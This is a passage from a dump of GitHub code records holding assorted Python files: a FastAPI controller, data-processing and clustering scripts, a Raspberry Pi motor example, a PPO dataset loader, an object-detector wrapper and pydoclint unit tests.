pokemon_service.update(pokemon)\n return {\"message\": \"✅Update pokemon done\", \"updated pokemon\": updated}\n\n async def delete_pokemon(self, id: int):\n try:\n is_exist = await pokemon_service.get_one(id)\n if is_exist:\n await pokemon_service.delete(id)\n\n return {\"message\": \"✅Success deleting pokemon\"}\n except:\n return {\"message\": \"❌Error during deleting\"}\n\n\npokemon_controller = PokemonController()\n","repo_name":"SekmSet/python-master","sub_path":"fastApi/controller/pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10638640960","text":"import numpy as np\nimport pandas as pd\nfrom string import digits\nfrom sklearn.feature_selection import SelectKBest\nfrom scipy.stats import 
pearsonr\nfrom matplotlib import pyplot as plt\nfrom sklearn import svm\nimport os\n\nos.getcwd()\n\nds = pd.read_csv('/Users/chengmingcui/Desktop/9321/melb_data.csv')\ncols_to_drop = ['Method','SellerG','Date','CouncilArea','Propertycount','Rooms','Postcode']\n\ndf = ds.drop(cols_to_drop, axis=1)\ndata = df.dropna()\ndata = data.reset_index(drop = True)\n\n\n## transform suburb to digit\nsuburb_list = data[\"Suburb\"].value_counts().index.tolist()\ndata_dict_suburb = {}\nflag = 0\nfor i in suburb_list:\n data_dict_suburb[i] = flag\n flag += 1\nsuburb = data[\"Suburb\"].tolist()\nll = []\nfor i in suburb:\n ll.append(data_dict_suburb[i])\n\ndata[\"flag_suburb\"] = ll\ndata.head()\naddress = data[\"Address\"].tolist()\nfinal_address = []\nfor i in address:\n for j in range(len(i)):\n if i[j] == \" \":\n res = i[j:].strip()\n final_address.append(res)\n break\ndata['street_Address'] = final_address\n\n\naddress_list = data['street_Address'].value_counts().index.tolist()\naddress_dict = {}\ncount = 0\nfor i in address_list:\n address_dict[i] = count\n count+=1\n \n## transform street to digit\nstreet_address_list = data['street_Address'].tolist()\nnew_Address = []\nfor i in street_address_list:\n new_Address.append(address_dict[i])\ndata['flag_street_Address'] = new_Address\n\ntype_list = data['Type'].value_counts().index.tolist()\ntype_dict={}\ncount = 0\nfor i in type_list:\n type_dict[i] = count\n count+=1\nflag_type= []\ntype_list_all = data['Type'].tolist()\nfor i in type_list_all:\n flag_type.append(type_dict[i])\ndata['flag_type'] = flag_type\n\n## transform region to digit\nRegion = data['Regionname'].value_counts().index.tolist()\nregion_dict = {}\ncount = 0\nfor i in Region:\n region_dict[i] = count\n count += 1\nregion_list = data['Regionname'].tolist()\nflag_regionname =[]\nfor i in region_list:\n flag_regionname.append(region_dict[i])\ndata['flag_regionname'] = flag_regionname\n\n\ndrop_col_second = ['Suburb','Address','Type','Regionname','street_Address']\ndata_final = data.drop(drop_col_second, axis=1)\n## the final data\ndata_final\n\n\n\n## this function removes outliers from the data\ndef get_outliners(dataset, outliers_fraction=0.25):\n clf = svm.OneClassSVM(nu=0.95 * outliers_fraction + 0.05, kernel=\"rbf\", gamma=0.1)\n clf.fit(dataset)\n result = clf.predict(dataset)\n return result\n## the data after removing outliers\ntraining_dataset = data_final[get_outliners(data_final, 0.15)==1]\n\n\n## get the training data and test data\ninput_cols =['Distance', 'Bedroom2', 'Bathroom', 'Car', 'Landsize',\n 'BuildingArea', 'YearBuilt', 'Lattitude', 'Longtitude', 'flag_suburb',\n 'flag_street_Address', 'flag_type','flag_regionname']\noutput_col = ['Price']\nX = training_dataset[input_cols].astype(float)\nY = training_dataset[output_col].astype(float)\nX= X.reset_index(drop = True)\nY = Y.reset_index(drop=True)\nX[:3289].to_csv('X_training_data.csv')\nX[3289:].to_csv('X_test_data.csv')\nY[:3289].to_csv('Y_training_data.csv')\nY[3289:].to_csv('Y_test_data.csv')\n","repo_name":"chengmingcui/9321masterteam","sub_path":"data_processing.py","file_name":"data_processing.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37016382928","text":"def kmedians(points, k, max_iterations=1000):\n import numpy as np # added: np is used below but was never imported\n from scipy.spatial.distance import cdist\n\n # Initialize k centroids randomly\n centroids = points[np.random.choice(range(len(points)), k, replace=False)]\n # 
Initialize cluster labels as zeros\n \n for _ in range(max_iterations):\n # Assign each data point to its closest centroid\n distances = cdist(points, centroids, metric='cityblock')\n labels = np.argmin(distances, axis=1)\n\n # Update the cluster centers using medians\n new_centers = np.array([np.median(points[labels == i], axis=0) for i in range(k)])\n\n # Check convergence\n if np.array_equal(centroids, new_centers):\n break\n\n centroids = new_centers\n\n # prev_labels = labels.copy()\n dict_dividedPoints = { i: points[labels == i] for i in range(k) }\n # Return the centroids and labels\n return centroids, dict_dividedPoints\n","repo_name":"mrfikri-ai/Machine-Learning","sub_path":"Clustering/kmedians.py","file_name":"kmedians.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15456799493","text":"import logging\nimport time\n\nfrom smbus2 import SMBus\n\nfrom raspberry_py.gpio import setup, CkPin, cleanup\nfrom raspberry_py.gpio.adc import ADS7830\nfrom raspberry_py.gpio.motors import DcMotor, DcMotorDriverL293D\n\n\ndef main():\n \"\"\"\n This example drives a DC motor as shown on page 164 of the tutorial.\n \"\"\"\n\n logging.getLogger().setLevel(logging.DEBUG)\n\n setup()\n\n # create a/d converter for potentiometer. rescale potentiometer to the speed values expected by the motor.\n adc = ADS7830(\n input_voltage=3.3,\n bus=SMBus('/dev/i2c-1'),\n address=ADS7830.ADDRESS,\n command=ADS7830.COMMAND,\n channel_rescaled_range={0: (-100, 100)}\n )\n\n dc_motor = DcMotor(\n driver=DcMotorDriverL293D(\n enable_pin=CkPin.GPIO22,\n in_1_pin=CkPin.GPIO27,\n in_2_pin=CkPin.GPIO17\n ),\n speed=0\n )\n\n # start motor and update its speed on a/d events\n dc_motor.start()\n adc.event(lambda s: dc_motor.set_speed(s.channel_value[0]))\n\n try:\n while True:\n adc.update_state()\n time.sleep(0.5)\n except KeyboardInterrupt:\n pass\n\n dc_motor.stop()\n adc.close()\n cleanup()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MatthewGerber/raspberry-py","sub_path":"src/raspberry_py/gpio/examples/dc_motor_with_potentiometer.py","file_name":"dc_motor_with_potentiometer.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32447425910","text":"import random\nimport string\n\n# randomly remove x% of characters in name\ndef random_remove(name, remove_prob):\n if not name: return name\n randomized_name = ''\n for char in name:\n random_value = random.random()\n if random_value >= remove_prob:\n randomized_name += char\n return randomized_name\n\n# randomly replace x% of characters with another lower-case alphabetic character\ndef random_replace(name, replace_prob):\n if not name: return name\n randomized_name = ''\n for char in name:\n random_value = random.random()\n if random_value < replace_prob:\n next_char = random.choice(string.ascii_lowercase)\n else:\n next_char = char\n randomized_name += next_char\n return randomized_name\n\n# randomly set name to None/NULL x% of the time\ndef random_null(name, null_prob):\n random_value = random.random()\n if random_value < null_prob:\n return None\n else:\n return name\n\n# randomly remove/replace characters in name, and randomly set entire name to NULL with given probabilities\ndef mangle_org_name(name, remove_prob, replace_prob, null_prob):\n randomized_name = random_null(name, null_prob)\n randomized_name = random_remove(randomized_name, 
remove_prob)\n randomized_name = random_replace(randomized_name, replace_prob)\n\n return randomized_name\n \n","repo_name":"openreferral/silobuster-model-trainer","sub_path":"manglers/mangle_org_name.py","file_name":"mangle_org_name.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"393490904","text":"import taichi as ti\nimport numpy as np\nimport math\n\nfrom global_variabel import *\nfrom script.helper_function import *\n\n## declare field\nmesh_position = None\nmesh_rotation = []\n\n## initialize bodies\ndef init_collision_bodies():\n # init rotation\n for b_idx in range(num_static_meshes+num_dynamic_meshes):\n mesh_rotation.append(ti.Vector([0., (3./2.)*math.pi, 0.]))\n # mesh_rotation[b_idx] = ti.Vector([0., math.pi - 0.5*b_idx, 0.])\n\ndef init_collision_bodies_lighthouse_scene():\n # init rotation\n for b_idx in range(num_collision_bodies):\n mesh_rotation[b_idx] = ti.Vector([0., (math.pi/4)*b_idx, 0.])\n # create mesh particles\n idx = 0\n for b_idx in range(num_collision_bodies):\n mesh = meshio.read(mesh_names[b_idx])\n mesh_points = mesh.points\n R = rotation_mat(mesh_rotation[b_idx][0],mesh_rotation[b_idx][1],mesh_rotation[b_idx][2])\n print_mesh_info(b_idx, mesh_points.shape[0], R)\n for i in range(mesh_points.shape[0]):\n mesh_position[idx] = ti.Vector(R @ np.array(mesh_points[i]))\n mesh_position[idx] *= 10* (1-b_idx*0.65)\n mesh_position[idx] += ti.math.vec3([21., 1., 14.]) + b_idx*ti.math.vec3([-6., 0., 15.])\n idx += 1 \n\ndef init_collision_bodies_bathroom_scene():\n # init rotation\n for b_idx in range(num_collision_bodies):\n mesh_rotation[b_idx] = ti.Vector([0., math.pi/2.- (0.3+math.pi)*b_idx, 0.])\n # create mesh particles\n idx = 0\n for b_idx in range(num_collision_bodies):\n mesh = meshio.read(mesh_names[b_idx])\n mesh_points = mesh.points\n R = rotation_mat(mesh_rotation[b_idx][0],mesh_rotation[b_idx][1],mesh_rotation[b_idx][2])\n print_mesh_info(b_idx, mesh_points.shape[0], R)\n for i in range(mesh_points.shape[0]):\n mesh_position[idx] = ti.Vector(R @ np.array(mesh_points[i]))\n mesh_position[idx] *= 8 * (1-b_idx/2*0.3)\n mesh_position[idx] += ti.math.vec3([22., 0., 40.]) + b_idx*ti.math.vec3([-7., 0., -20./(b_idx+1)])\n idx += 1 \n\n## print info\ndef print_mesh_info(b_idx, num, R):\n print(\"Insert Mesh vtk-file: \"+mesh_names[b_idx]+\"\\n\"\n +\" number of particles: \"+str(num)+\"\\n\"\n +\" rotation angels: \"+str(mesh_rotation[b_idx])+\"\\n\"\n +\" rotation matrix: [\"+str(R[0])+\"\\n\"\n +\" \"+str(R[1])+\"\\n\"\n +\" \"+str(R[2])+\"]\")\n print('-'*term_size.columns)","repo_name":"mingj1125/PBS_Project","sub_path":"script/mesh_collision.py","file_name":"mesh_collision.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36279277112","text":"import torch\nfrom ppo_wdail.systems.datagenerator import DataGenerator\nfrom VAE.models.swae import SWAE\nimport numpy as np\nimport os\nimport pickle\n\nclass ExpertDataLoader(torch.utils.data.Dataset):\n def __init__(self, params, data_size, batch_size, device):\n self.data_generator = DataGenerator()\n self.data_generator.generate_data()\n ntrain, ntest, file_batch_num = self.data_generator.__len__()\n print(\"Total Train Dataset Size: \", ntrain, \" Total Test Dataset Size: \", ntest, \"File Batch Size: \", file_batch_num)\n self.data_size = data_size\n self.batch_size = batch_size\n self.file_batch_num = 
file_batch_num\n self.params = params\n self.device = device\n self.load_neighbors = None\n self.dataset_array = []\n\n def sample_neighbor(self, neighbors_num, name=\"train\"):\n if self.load_neighbors == neighbors_num:\n # pick one stored sample at random\n idx = np.random.randint(0, len(self.dataset_array))\n dataset = self.dataset_array[idx]\n state = np.array(dataset)[0:-1]\n neighbor = np.array(state[3]).flatten()\n return neighbor\n else:\n print(\"Dataset must be loaded\")\n return None\n\n def sample_size(self, neighbors_num, name=\"train\"):\n if self.load_neighbors == neighbors_num:\n return len(self.dataset_array)\n else:\n print(\"Dataset must be loaded\")\n return None\n\n def load_batch(self, idx=None):\n # if a cache exists, load and return it\n if os.path.exists(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache/cache_id{}.pkl'.format(idx))):\n with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache/cache_id{}.pkl'.format(idx)), 'rb') as f:\n dataset = pickle.load(f)\n print(\"dataset loaded from \", os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache/cache_id{}.pkl'.format(idx)))\n return dataset\n train_dataset_dict, test_dataset_dict = self.data_generator.load_data(idx)\n model = SWAE(**self.params[\"swae\"]).to(self.device)\n model_load_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../VAE/output/model.pth')\n model.load_state_dict(torch.load(model_load_path, map_location=self.device))\n model.eval()\n dataset = []\n # split the data by the number of neighboring UAVs\n for key in train_dataset_dict.keys():\n print(\"agent_num: \", key, \" train_dataset: \", len(train_dataset_dict[key]))\n train_dataset = train_dataset_dict[key]\n batch_x = []\n batch_y = []\n # convert the depth images into latent variables\n for train_data in train_dataset:\n depth = train_data[4]\n depth = torch.from_numpy(depth).unsqueeze(0).unsqueeze(0).to(self.device)\n mu, log_var = model.encode(depth)\n z = model.reparameterize(mu, log_var)\n train_data[4] = z.cpu().detach().numpy()\n state = np.array(train_data)[0:-1]\n action = np.array(train_data)[-1]\n goal = np.array(state[1]).flatten()\n velocity = np.array(state[2]).flatten()\n neighbor = np.array(state[3]).flatten()\n depth = np.array(state[4][0]).flatten()\n combined = np.concatenate((goal, velocity, depth, neighbor))\n batch_x.append(combined)\n batch_y.append(action)\n batch_x = np.array(batch_x, dtype=np.float32)\n batch_y = np.array(batch_y, dtype=np.float32)\n # split into batch-sized chunks and convert to torch tensors\n for i in range(0, len(batch_x), self.params[\"ppo\"][\"batch_size\"]):\n batch_x_torch = torch.from_numpy(batch_x[i:i+self.params[\"ppo\"][\"batch_size\"]])\n batch_y_torch = torch.from_numpy(batch_y[i:i+self.params[\"ppo\"][\"batch_size\"]])\n dataset.append([batch_x_torch, batch_y_torch])\n # the size of batch_x_torch is 3 (goal position) + 3 (velocity) + 6*neighbor_num + hidden state\n print(\"dataset size: \", len(dataset), \"x\", self.params[\"ppo\"][\"batch_size\"])\n with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache/cache_id{}.pkl'.format(idx)), 'wb') as f:\n pickle.dump(dataset, f)\n return dataset\n\nclass ExpertDataset(torch.utils.data.Dataset):\n def __init__(self, params, device, save_memory=False, use_preprocessed_data=False):\n self.save_memory = save_memory\n self.data_generator = DataGenerator(params=params, device=device, encode_depth=save_memory)\n # TODO: support use_preprocessed_data\n if not use_preprocessed_data:\n self.data_generator.generate_data()\n ntrain, ntest, file_batch_num = self.data_generator.__len__()\n print(\"Total Train Dataset Size: \", 
ntrain, \" Total Test Dataset Size: \", ntest, \"File Batch Size: \", file_batch_num)\n self.file_batch_num = file_batch_num\n\n self.data_size = params[\"wdail\"][\"data_size\"]\n self.params = params\n self.device = device\n self.load_neighbors = None\n self.trajectory = {}\n\n self.encoder = SWAE(**self.params[\"swae\"]).to(self.device)\n model_load_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../VAE/output/model.pth')\n self.encoder.load_state_dict(torch.load(model_load_path, map_location=self.device))\n self.encoder.eval()\n\n def load_dataset(self, neighbors_num, name=\"train\"):\n if self.load_neighbors == neighbors_num:\n print(\"Dataset already loaded\")\n return\n self.load_neighbors = neighbors_num\n # キャッシュが存在する場合はそれを読み込む\n file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache/cache_{}_nn{}.pkl'.format(name, neighbors_num))\n if os.path.exists(file_path):\n with open(file_path, 'rb') as f:\n dataset = pickle.load(f)\n print(\"dataset loaded from \", file_path)\n self.trajectory = dataset\n return\n train_dataset, _ = self.data_generator.load_data(neighbors_num=neighbors_num, max_data_size=self.data_size)\n state_array = []\n action_array = []\n\n if not train_dataset:\n print(\"No data\")\n return\n\n for i in range(len(train_dataset)):\n item = train_dataset[i]\n if self.save_memory:\n z = torch.from_numpy(item[4])\n # print(\"Shape of Encoded Depth: \", z.shape)\n else:\n if i % 1000 == 0:\n print(\"Encoding Progress: \", i, \"/\", len(train_dataset))\n depth = item[4]\n depth = torch.from_numpy(depth).unsqueeze(0).unsqueeze(0).to(self.device)\n mu, log_var = self.encoder.encode(depth)\n z = self.encoder.reparameterize(mu, log_var).squeeze(0).to(\"cpu\").detach()\n goal = torch.from_numpy(item[1])\n velocity = torch.from_numpy(item[2])\n neighbor = torch.from_numpy(item[3]).flatten()\n action = torch.from_numpy(item[5])\n\n if neighbor.shape[0] > 0:\n combined = torch.cat([goal, velocity, z, neighbor], dim=0)\n else:\n combined = torch.cat([goal, velocity, z], dim=0)\n state_array.append(combined)\n action_array.append(action)\n\n self.trajectory[\"state\"] = state_array\n self.trajectory[\"action\"] = action_array\n # ディレクトリが存在しない場合は作成\n if not os.path.exists(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache')):\n os.mkdir(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../cache'))\n with open(file_path, 'wb') as f:\n pickle.dump(self.trajectory, f)\n\n def __len__(self):\n if self.load_neighbors is not None:\n return len(self.trajectory[\"state\"])\n else:\n print(\"Dataset must be loaded\")\n return None\n\n def __getitem__(self, idx):\n if self.load_neighbors is not None:\n return self.trajectory[\"state\"][idx], self.trajectory[\"action\"][idx]\n else:\n print(\"Dataset must be loaded\")\n return None\n\n def sample_neighbor(self, neighbors_num, name=\"train\"):\n if self.load_neighbors == neighbors_num:\n idx = np.random.randint(0, len(self.trajectory[\"state\"]))\n dataset = self.trajectory[\"state\"][idx]\n neighbor = dataset[self.params[\"env\"][\"state_dim\"]+self.encoder.latent_dim:]\n return neighbor\n else:\n print(\"Dataset must be loaded\")\n return None","repo_name":"allegorywrite/polka_dot","sub_path":"ppo_wdail/systems/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8373459294","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 4 
","repo_name":"allegorywrite/polka_dot","sub_path":"ppo_wdail/systems/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8373459294","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 4 16:10:46 2018\n\n@author: clark\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\n\nimage_size=64\ndepth=10\nlearning_rate=0.0001\ntrain_from_scratch=1\ntraining_epochs=50\nimage_path='./images808_64_64_3.npy'\nlabel_path='./labels808_2.npy'\nimages=np.load(image_path)\nlabels=np.load(label_path)\nlen_files=np.shape(labels)[0]\nbatch_size=4\n\n#for epoch in range(training_epochs):\navg_cost = 0.\ntotal_snippets = len_files-depth\ntotal_batch=int(total_snippets/batch_size)\n# Loop over all batches\n# total_pred=np.zeros([0,2])\nfor s in range(12):#range(total_snippets-1):\n batch_x=np.zeros([0,depth,image_size,image_size,3])\n for i in range(4):\n batch_x=np.concatenate((batch_x,np.expand_dims(images[s:s+depth,:,:,:],axis=0)))\n \n# batch_x = images[batch_size,i]\n# batch_y = labels[i*batch_size:(i+1)*batch_size]","repo_name":"zyclarkcheng/shot-boundary-detection-by-fcn","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"22781220257","text":"print(\"Welcome to the tip calculator!\")\r\nbill = float(input(\"What was the total bill? $\"))\r\ntip = int(input(\"How much tip would you like to give? \"))\r\npeople = int(input(\"How many people to split the bill? \"))\r\n\r\nbill_with_tip = tip/100 * bill + bill\r\neach_person = (bill_with_tip / people)\r\nfinal = \"{:.2f}\".format(each_person)\r\n# e.g. (150.00 * 1.12) / 5 = 33.60\r\n\r\nprint(f\"Each person should pay: ${final}\")","repo_name":"afarah45/python","sub_path":"tip_cal.py","file_name":"tip_cal.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72309549814","text":"import numpy as np\nimport torch\nimport cv2\nimport os\nimport shutil\n\nfrom glob import glob\nfrom tqdm import tqdm\nfrom PIL import Image\n\nfrom models.model import Model\n\n\nclass MdefDetector(object):\n def __init__(self, model_name=\"mdef_detr_minus_language\", ckpt_path=\"ckpts/MDef_DETR_minus_language_r101_epoch10.pth\"):\n self.model = Model(model_name, ckpt_path).get_model()\n \n def detect(self, image_path, conf_thresh=0.25, caption=\"all objects\", multi_crop=False, verbose=False):\n assert isinstance(image_path, str)\n # Note: Caption is only required for MViTs\n if multi_crop:\n dets = self.model.infer_image_multi_crop(image_path, caption=caption)\n else:\n dets = self.model.infer_image(image_path, caption=caption)\n\n bboxes = np.array(dets[0], dtype=np.int32)\n confs = np.array(dets[1], dtype=np.float32)\n idx = np.where(confs >= conf_thresh)\n new_dets = np.zeros((len(idx[0]), 6), dtype=np.float32)\n new_dets[:, :4] = bboxes[idx]\n new_dets[:, -2] = confs[idx]\n new_dets[:, -1] = -1\n h, w, _ = cv2.imread(image_path).shape\n new_dets[np.where(new_dets[:, 0] < 0), 0] = 0\n new_dets[np.where(new_dets[:, 1] < 0), 1] = 0\n new_dets[np.where(new_dets[:, 2] > w), 2] = w\n new_dets[np.where(new_dets[:, 3] > h), 3] = h\n if verbose:\n print(\"mdef_dets: \", new_dets)\n return new_dets\n\n \nif __name__ == \"__main__\":\n model_name=\"mdef_detr_minus_language\"\n ckpt_path=\"ckpts/MDef_DETR_minus_language_r101_epoch10.pth\"\n detector = MdefDetector(model_name, ckpt_path)\n img_path = \"/home/ubuntu/codes/SimilarVan/data/Girl/0005.jpg\"\n detector.detect(img_path, 
verbose=True)","repo_name":"armada-ai/SimilarVan","sub_path":"detectors/mdef_detector.py","file_name":"mdef_detector.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73376999092","text":"import ast\nfrom typing import Dict, Tuple\n\nimport pytest\n\nfrom pydoclint.utils.astTypes import FuncOrAsyncFuncDef\nfrom pydoclint.utils.generic import getFunctionId\nfrom pydoclint.utils.return_yield_raise import (\n hasGeneratorAsReturnAnnotation,\n hasRaiseStatements,\n hasReturnAnnotation,\n hasReturnStatements,\n hasYieldStatements,\n)\n\nsrc1 = \"\"\"\ndef func1():\n return 101\n\"\"\"\n\nsrc2 = \"\"\"\ndef func2():\n print(\"No return here\")\n\"\"\"\n\nsrc3 = \"\"\"\nasync def func3():\n def func3_child1():\n print(301)\n def func3_child1_grandchild1():\n print(3011)\n return \"async 301\"\n\"\"\"\n\nsrc4 = \"\"\"\ndef func4():\n def func4_child1():\n return \"nested 401\"\n\n def func4_child2():\n print('402')\n def func4_child2_grandchild1():\n return 4021\n\"\"\"\n\nsrc5 = \"\"\"\ndef func5():\n if 1 > 2:\n return 501\n\n if 2 > 6:\n return 506\n\"\"\"\n\nsrc6 = \"\"\"\ndef func6():\n if 5 > 4:\n while 3 > 2:\n for i in range(10):\n async for j in range(10):\n with open('file1') as f1:\n async with open('file2') as f2:\n return True\n\"\"\"\n\nsrc7 = \"\"\"\nclass MyClass:\n def __init__(self):\n pass\n\n def method1(self):\n print('a1')\n def method1_child1(self):\n pass\n return 2\n\n @classmethod\n def classmethod1(cls):\n pass\n def classmethod1_child1():\n return 'hello'\n\"\"\"\n\n\n@pytest.mark.parametrize(\n 'src, expected',\n [\n (src1, True),\n (src2, False),\n (src3, True),\n (src4, False),\n (src5, True),\n (src6, True),\n ],\n)\ndef testHasReturnStatements(src: str, expected: bool) -> None:\n tree = ast.parse(src)\n assert len(tree.body) == 1 # sanity check\n assert isinstance(tree.body[0], (ast.FunctionDef, ast.AsyncFunctionDef))\n assert hasReturnStatements(tree.body[0]) == expected\n\n\ndef testHasReturnStatements_inClass() -> None:\n tree = ast.parse(src7)\n assert len(tree.body) == 1 # sanity check\n assert isinstance(tree.body[0], ast.ClassDef)\n assert len(tree.body[0].body) == 3\n\n expected_list = [False, True, False]\n for node, expected in zip(tree.body[0].body, expected_list):\n assert hasReturnStatements(node) == expected\n\n\nclass HelperVisitor(ast.NodeVisitor):\n \"\"\"A helper class to check each return statements in nested functions\"\"\"\n\n def __init__(self):\n self.returnStatements: Dict[Tuple[int, int, str], bool] = {}\n self.yieldStatements: Dict[Tuple[int, int, str], bool] = {}\n self.raiseStatements: Dict[Tuple[int, int, str], bool] = {}\n self.returnAnnotations: Dict[Tuple[int, int, str], bool] = {}\n self.generatorAnnotations: Dict[Tuple[int, int, str], bool] = {}\n\n def visit_FunctionDef(self, node: FuncOrAsyncFuncDef):\n functionId: Tuple[int, int, str] = getFunctionId(node)\n self.returnStatements[functionId] = hasReturnStatements(node)\n self.yieldStatements[functionId] = hasYieldStatements(node)\n self.raiseStatements[functionId] = hasRaiseStatements(node)\n self.returnAnnotations[functionId] = hasReturnAnnotation(node)\n self.generatorAnnotations[functionId] = hasGeneratorAsReturnAnnotation(\n node,\n )\n self.generic_visit(node)\n\n def visit_AsyncFunctionDef(self, node: ast.AsyncFunctionDef):\n # Treat async functions similarly to regular ones\n self.visit_FunctionDef(node)\n\n\nsrcNested = \"\"\" # Return annotations and statements are 
intentionally opposite\ndef func4() -> int:\n def func4_child1():\n return \"nested 401\"\n\n def func4_child2() -> float:\n print('402')\n def func4_child2_grandchild1():\n return 4021\n\n def func4_child3() -> List[str]:\n print(1)\n\n def func4_child4():\n class NestedClass:\n def func4_child4_grandchild1(self):\n return 2\n\n def func4_child4_grandchild2(self) -> Dict[str, Tuple[int, float]]:\n print(1)\n\n return 1\n\"\"\"\n\n\ndef testHasReturnStatements_nestedFunction() -> None:\n tree = ast.parse(srcNested)\n visitor = HelperVisitor()\n visitor.visit(tree)\n result = visitor.returnStatements\n\n expected = {\n (2, 0, 'func4'): False,\n (3, 4, 'func4_child1'): True,\n (6, 4, 'func4_child2'): False,\n (8, 8, 'func4_child2_grandchild1'): True,\n (11, 4, 'func4_child3'): False,\n (14, 4, 'func4_child4'): True,\n (16, 12, 'func4_child4_grandchild1'): True,\n (19, 12, 'func4_child4_grandchild2'): False,\n }\n\n assert result == expected\n\n\n@pytest.mark.parametrize(\n 'src, expected',\n [\n ('def func1():\\n return 1', False),\n ('def func1() -> int:\\n print(123)', True),\n ('def func1() -> int | float | None:\\n print(123)', True),\n ],\n)\ndef testHasReturnAnnotation(src: str, expected: bool) -> None:\n tree = ast.parse(src)\n assert len(tree.body) == 1 # sanity check\n assert isinstance(tree.body[0], (ast.FunctionDef, ast.AsyncFunctionDef))\n assert hasReturnAnnotation(tree.body[0]) == expected\n\n\ndef testHasReturnAnnotations_nestedFunction() -> None:\n tree = ast.parse(srcNested)\n visitor = HelperVisitor()\n visitor.visit(tree)\n result = visitor.returnAnnotations\n\n expected = {\n (2, 0, 'func4'): True,\n (3, 4, 'func4_child1'): False,\n (6, 4, 'func4_child2'): True,\n (8, 8, 'func4_child2_grandchild1'): False,\n (11, 4, 'func4_child3'): True,\n (14, 4, 'func4_child4'): False,\n (16, 12, 'func4_child4_grandchild1'): False,\n (19, 12, 'func4_child4_grandchild2'): True,\n }\n\n assert result == expected\n\n\nsrcGenerator = \"\"\"\ndef genFuncExample1() -> Generator[int, None, int]:\n yield 1\n yield 2\n return 3\n\ndef genFuncExample2():\n yield 1\n yield 2\n return 3\n\ndef someFunc1() -> Generator[int, None, int]:\n return 1\n\ndef someFunc2():\n yield from genFuncExample2()\n\ndef someFunc3() -> Generator[int, None, None]:\n def someFunc3_child1():\n yield 2\n\n return 1\n\ndef someFunc4():\n yield from range(10)\n def someFunc4_child1():\n yield 2\n\n yield 3\n\ndef someFunc5(arg1):\n if arg1 > 3:\n yield 1\n\n if arg < -1:\n yield 2\n\"\"\"\n\n\ndef testHasGeneratorAsReturnAnnotation() -> None:\n tree = ast.parse(srcGenerator)\n visitor = HelperVisitor()\n visitor.visit(tree)\n result = visitor.generatorAnnotations\n\n expected = {\n (2, 0, 'genFuncExample1'): True,\n (7, 0, 'genFuncExample2'): False,\n (12, 0, 'someFunc1'): True,\n (15, 0, 'someFunc2'): False,\n (18, 0, 'someFunc3'): True,\n (24, 0, 'someFunc4'): False,\n (19, 4, 'someFunc3_child1'): False,\n (26, 4, 'someFunc4_child1'): False,\n (31, 0, 'someFunc5'): False,\n }\n\n assert result == expected\n\n\ndef testHasYieldStatement() -> None:\n tree = ast.parse(srcGenerator)\n visitor = HelperVisitor()\n visitor.visit(tree)\n result = visitor.yieldStatements\n\n expected = {\n (2, 0, 'genFuncExample1'): True,\n (7, 0, 'genFuncExample2'): True,\n (12, 0, 'someFunc1'): False,\n (15, 0, 'someFunc2'): True,\n (18, 0, 'someFunc3'): False,\n (24, 0, 'someFunc4'): True,\n (19, 4, 'someFunc3_child1'): True,\n (26, 4, 'someFunc4_child1'): True,\n (31, 0, 'someFunc5'): True,\n }\n\n assert result == expected\n\n\nsrcRaises = 
